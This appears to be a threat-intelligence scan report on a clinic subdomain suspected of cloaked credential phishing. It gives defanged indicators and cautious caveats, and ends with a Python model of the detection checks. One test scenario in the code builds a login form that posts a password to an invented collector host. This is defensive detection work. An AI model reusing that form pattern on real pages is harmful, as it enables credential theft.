https://wa.advancedspineandposture.com/
104.18.30.192 · Cloudflare, Inc.
Toronto, Canada
3716 days
200 · 69.3s
Valid · E8, Let's Encrypt, US
COMPLETED
Registered-domain escalation
Submit advancedspineandposture.com (the registered domain) as the primary IOC, enriched with evidence from hostile subdomains such as wa.advancedspineandposture.com.
No KB/IOK detections were recorded for this scan.
healthcare | technology · 6/3/2026
The page presents a cloaked single-page application (SPA) on a subdomain of advancedspineandposture.com. The analyst reports an off.php endpoint and dynamically loaded scripts that suggest off-domain credential collection, but the capture itself (canonical stage: Late Render, +3s) recorded no login form: 0 forms, 0 password fields and no late-stage login UI. Any credential form would therefore have to be rendered by JavaScript after the canonical capture point, or served only to visitors that the cloaking logic lets through. Visual and network indicators show assets loaded from unrelated domains. Taken together this points to possible credential harvesting rather than legitimate first-party clinic content, but the recorded capture does not confirm it. The site is hosted behind Cloudflare and uses a Let's Encrypt certificate valid through Aug 2026. Analyst note: this target may cloak content or block scanners.
Capture
Stages: 3
Canonical: Late Render (+3s)
Changed: No
Credential Signals
Forms: 0
Password fields: 0
Late-stage login UI: No
Resource Signals
Resources: 200
Hosts: 8
Domains: 8
Suspicious Endpoints
hxxps://cdn3d[.]iconscout[.]com/3d/free/thumb/free-telegram-3d-icon-png-download-7516821.png
hxxps://img[.]haberkurt[.]com/icons/telegram.webp
Off-Domain Posts
hxxps://cdn3d[.]iconscout[.]com/3d/free/thumb/free-telegram-3d-icon-png-download-7516821.png
hxxps://img[.]haberkurt[.]com/icons/telegram.webp
The page sits under a legitimate-sounding medical clinic subdomain, but its content shows signs of cloaking and relies on off-domain endpoints for dynamic content. The reported off.php endpoint, external assets from unrelated domains, and an SPA design that can render a credential form without any static HTML together indicate a possible data-harvesting or credential-phishing setup. The evidence has limits: the only off-domain endpoints enumerated above are two Telegram icon images (served from cdn3d.iconscout.com and img.haberkurt.com), the same two URLs appear under both Suspicious Endpoints and Off-Domain Posts, and no form submission to an off-domain collector was captured, so the credential-harvesting assessment rests on the analyst's observations rather than on the recorded capture. Abuse risk (credential collection or adware) is moderate to high. The TLS certificate is valid; issuance by Let's Encrypt is not itself an indicator either way, since it is free and used by legitimate and malicious sites alike. The domain is over ten years old (3716 days), which would normally lower suspicion, but the analyst-reported cloaking outweighs that and should be treated as suspicious: an operator that serves different content to scanners is actively evading automated analysis. Recommend monitoring, and blocking if further evidence of credential harvesting corroborates the analyst's observations. Analyst note: this target may cloak content or block scanners.
Monitor
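Added example (not the scanner's own code): a small Python model of the two checks this report relies on, the staged-capture credential signals (forms, password fields, late-stage login UI, off-domain POSTs) and the registered-domain escalation that promotes advancedspineandposture.com to the primary IOC with the subdomain and defanged off-domain URLs as evidence. It assumes the scanner's stage snapshots and request log resemble the constructed inputs below; the host collector.example and its /off.php path are invented for the second scenario, and the short two-label suffix table stands in for the full Public Suffix List.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumption: a few two-label public suffixes. A real tool should use the
# full Public Suffix List so that a.b.co.uk escalates to b.co.uk, not co.uk.
MULTI_LABEL_SUFFIXES = {"co.uk", "com.au", "co.jp", "com.br"}


def registered_domain(host):
    """Registrable domain (eTLD+1) of a host name."""
    labels = host.lower().rstrip(".").split(".")
    keep = 3 if len(labels) >= 3 and ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES else 2
    return ".".join(labels[-keep:])


def defang(url):
    """hxxp(s)://host[.]tld/... form used in the report's IOC lists."""
    scheme, rest = url.split("://", 1)
    host, sep, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + "://" + host.replace(".", "[.]") + sep + path


class _FormScanner(HTMLParser):
    """Count <form> elements and password inputs in one DOM snapshot."""

    def __init__(self):
        super().__init__()
        self.forms, self.password_fields, self.actions = 0, 0, []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms += 1
            self.actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_fields += 1


def credential_signals(stages):
    """stages: [(label, html), ...] in capture order; the last one is canonical.
    Late-stage login UI = a password field absent in the first snapshot but
    present in the last, i.e. rendered by script rather than shipped as HTML."""
    per_stage = []
    for label, html in stages:
        p = _FormScanner()
        p.feed(html)
        per_stage.append({"stage": label, "forms": p.forms,
                          "password_fields": p.password_fields, "actions": p.actions})
    first, last = per_stage[0], per_stage[-1]
    late = first["password_fields"] == 0 and last["password_fields"] > 0
    return {"forms": last["forms"], "password_fields": last["password_fields"],
            "late_stage_login_ui": late, "stages": per_stage}


def off_domain(requests, page_host, methods=None):
    """URLs whose registrable domain differs from the page's, optionally by method."""
    base = registered_domain(page_host)
    return sorted({r["url"] for r in requests
                   if (methods is None or r["method"] in methods)
                   and registered_domain(urlsplit(r["url"]).hostname or "") != base})


def build_report(page_host, stages, requests):
    """Signals plus the escalation bundle: registered domain as primary IOC,
    the hostile subdomain and defanged off-domain URLs as supporting evidence."""
    return {"credential_signals": credential_signals(stages),
            "off_domain_posts": [defang(u) for u in off_domain(requests, page_host, {"POST"})],
            "escalation": {"primary_ioc": registered_domain(page_host),
                           "hostile_subdomains": [page_host],
                           "evidence": [defang(u) for u in off_domain(requests, page_host)]}}


# Constructed inputs. First, a capture like the one above: no form at any stage.
SCAN_HOST = "wa.advancedspineandposture.com"
SHELL = "<html><body><div id='app'></div></body></html>"
STAGES_AS_SEEN = [("Initial", SHELL),
                  ("Late Render (+3s)", "<html><body><div id='app'>"
                   "<img src='https://img.haberkurt.com/icons/telegram.webp'></div></body></html>")]
REQUESTS_AS_SEEN = [
    {"method": "GET", "url": "https://wa.advancedspineandposture.com/"},
    {"method": "GET", "url": "https://cdn3d.iconscout.com/3d/free/thumb/"
                             "free-telegram-3d-icon-png-download-7516821.png"},
    {"method": "GET", "url": "https://img.haberkurt.com/icons/telegram.webp"}]
# Second, what a script-rendered credential form posting off-domain would look
# like. collector.example and /off.php are invented for this example.
STAGES_RENDERED_LOGIN = [("Initial", SHELL),
                         ("Late Render (+3s)", "<html><body><form action='https://collector.example/off.php'>"
                          "<input type='text' name='user'><input type='password' name='pass'>"
                          "</form></body></html>")]
REQUESTS_RENDERED_LOGIN = REQUESTS_AS_SEEN + [{"method": "POST", "url": "https://collector.example/off.php"}]

if __name__ == "__main__":
    import json
    for stages, reqs in ((STAGES_AS_SEEN, REQUESTS_AS_SEEN), (STAGES_RENDERED_LOGIN, REQUESTS_RENDERED_LOGIN)):
        print(json.dumps(build_report(SCAN_HOST, stages, reqs), indent=2))
```

Run against the first scenario the report comes out exactly like the listing above (0 forms, 0 password fields, no late-stage login UI, no off-domain POSTs, and the two defanged Telegram icon URLs as the only evidence); the second scenario shows what the capture would have to contain before the credential-harvesting verdict is supported by the data rather than by analyst observation.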